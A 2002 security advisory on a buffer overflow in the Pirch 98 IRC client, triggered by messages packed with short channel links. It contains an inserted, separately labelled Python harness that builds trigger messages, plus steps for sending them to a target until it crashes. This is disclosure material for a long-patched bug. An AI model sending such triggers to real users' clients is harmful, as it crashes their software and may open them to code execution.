From: David Rude II (davidthegain.com)
Date: Fri Jun 21 2002 - 03:48:48 CDT


    Author: David D. Rude II davidthegain.com
    Release Date: June 20th 2002
    Systems Affected: Pirch 98 on all versions of Windows capable of running
    it.
    Severity: Medium
    Credits: Cryptix from irc.pulltheplug.com
     
     
    Introduction:
    This bug was discovered a very long time ago by Cryptix. When I was made
    aware of the problem, which existed in Pirch 98, I tried to contact the
    Pirch developers, to no avail. So I decided to keep this bug unreleased for
    quite some time. The reason I am releasing this advisory now is that a
    new version of Pirch has been released, can be downloaded at pirch.com,
    and is no longer vulnerable to this kind of attack. I might have made a
    bad decision in keeping this advisory to myself; however, it was my choice
    at the time.
     
    Pirch is an IRC client that many Windows users run as a replacement for
    mIRC and other Windows IRC clients. It runs on many versions of Windows.
     
    Details:
    A buffer overflow exists in Pirch 98 that could potentially allow remote
    execution of arbitrary code. The overflow is in the way Pirch 98 handles
    links: hyperlinks to other channels and to websites, and possibly other
    forms of hyperlink. It is triggered when a long buffer made up of many
    such links is sent in either a channel message or a private message.
    Because the trigger is an ordinary channel or private message, anyone on
    the same IRC network who can message the victim can deliver it. As far as
    I can tell, the problem does not exist within the DCC Chat feature.
     
    To overflow the Pirch 98 client the buffer must be formatted correctly
    and must contain a specific number of links.
     
    Proof of Concept:
    Run Pirch 98 as the target and any other IRC client of your choice as the
    sender, then send the buffer below from the sender to the Pirch 98 client
    (in a shared channel or as a private message); you can test this for
    yourself.
     
    Here is an example of a properly formatted buffer:
    #t #e #s #t #i #n #g #t #e #s #t #i #n #g #t #e #s #t #i #n #g #t #e #s #t
    #i #n #g #t #e #s #t #i #n #g ........<lots of channel links>
     
    As you will discover, to reach the number of hyperlinks needed to overflow
    the client you need to make the links as short as possible: an IRC message
    line is limited in length (512 bytes including the trailing CRLF), so
    one-character channel names pack the most links into a single message.
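A small harness for building and sanity-checking the kind of trigger message described above, added here as an example; it is not part of the original advisory and is not Pirch's or the author's code. It assumes the RFC 1459 limit of 512 bytes per IRC line (which is why short links matter: they pack the most links into one message), and its channel-link pattern is an assumed approximation of how an IRC client recognises links, since the advisory documents neither Pirch's exact rule nor the link count that triggers the overflow. The sample prefix and channel name are constructed for the example.

```python
"""
Builds and checks trigger messages of the form the advisory describes:
a PRIVMSG whose body is a run of very short channel links ("#t #e #s ...").
The constants and the link-recognition rule are assumptions for this example;
the advisory does not state how many links are needed.
"""
import re
import string

# RFC 1459 section 2.3: an IRC line is at most 512 bytes including the CRLF.
IRC_MAX_LINE = 512
CRLF = "\r\n"

# Assumed approximation of how a client spots a channel link in message text:
# a '#' at the start of the text or after whitespace, followed by non-space,
# non-comma characters. Pirch's real rule is not documented in the advisory.
CHANNEL_LINK = re.compile(r"(?:^|(?<=\s))#[^\s,]+")


def build_link_payload(link_count, alphabet=string.ascii_lowercase):
    """Return `link_count` single-character channel links separated by spaces,
    e.g. build_link_payload(3) -> '#a #b #c'. One-character names are the
    shortest possible links, which is what the advisory says to use."""
    if link_count < 0:
        raise ValueError("link_count must be non-negative")
    return " ".join("#" + alphabet[i % len(alphabet)] for i in range(link_count))


def privmsg_line(target, payload):
    """Wrap a payload in the PRIVMSG command a client sends to the server."""
    return f"PRIVMSG {target} :{payload}{CRLF}"


def fits_irc_line(line, source_prefix_len=0):
    """True if the line survives the 512-byte limit. `source_prefix_len` is the
    length of the ':nick!user@host ' prefix the server prepends when relaying
    the message to the recipient; it counts against the same limit."""
    return len(line.encode("utf-8")) + source_prefix_len <= IRC_MAX_LINE


def max_links_per_line(target, link_len=2, source_prefix_len=0):
    """Largest number of `link_len`-character links (plus separating spaces)
    that fit in one PRIVMSG to `target` after the server adds its prefix."""
    overhead = len(f"PRIVMSG {target} :") + len(CRLF) + source_prefix_len
    room = IRC_MAX_LINE - overhead
    if room < link_len:
        return 0
    # n links need n*link_len + (n-1) separators <= room
    return (room + 1) // (link_len + 1)


def count_channel_links(text):
    """Number of channel links a client using CHANNEL_LINK would see in text."""
    return len(CHANNEL_LINK.findall(text))


def candidate_lines(target, step=10, source_prefix_len=0):
    """Lines with an increasing number of links, all within the IRC limit, to
    be sent one after another until the client misbehaves. The advisory says
    a specific link count is needed but does not give it, so sweep upwards."""
    limit = max_links_per_line(target, 2, source_prefix_len)
    lines = [privmsg_line(target, build_link_payload(n))
             for n in range(step, limit + 1, step)]
    if limit % step:
        lines.append(privmsg_line(target, build_link_payload(limit)))
    return lines


if __name__ == "__main__":
    # Constructed sample: a 16-character source prefix such as ':tester!t@h.ost '
    prefix_len = len(":tester!t@h.ost ")
    limit = max_links_per_line("#test", source_prefix_len=prefix_len)
    line = privmsg_line("#test", build_link_payload(limit))
    print(f"{limit} links, {len(line)} bytes before the server prefix")
    print(line.strip()[:60] + " ...")
```

Send the lines from candidate_lines() one at a time from the second client, either to a channel the Pirch 98 client has joined or as private messages to it, raising the link count until the client misbehaves. Messages relayed by the server carry a ':nick!user@host ' prefix, so pass its length as source_prefix_len; otherwise the longest lines may be truncated by the server rather than delivered whole.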
     
    Exploitation:
    Exploiting this vulnerability is theoretically possible, but it would be
    very difficult. Where would you place the shellcode? That may be the
    toughest question to answer here: the trigger buffer itself has to be made
    of very short links, so it leaves little room for a payload, and any
    shellcode would have to be placed in memory some other way. Under the
    right conditions it is certainly plausible that exploitation can occur.
     
    The Fix:
    The most obvious solution is to upgrade to the latest version of Pirch,
    which can be downloaded from www.pirch.com.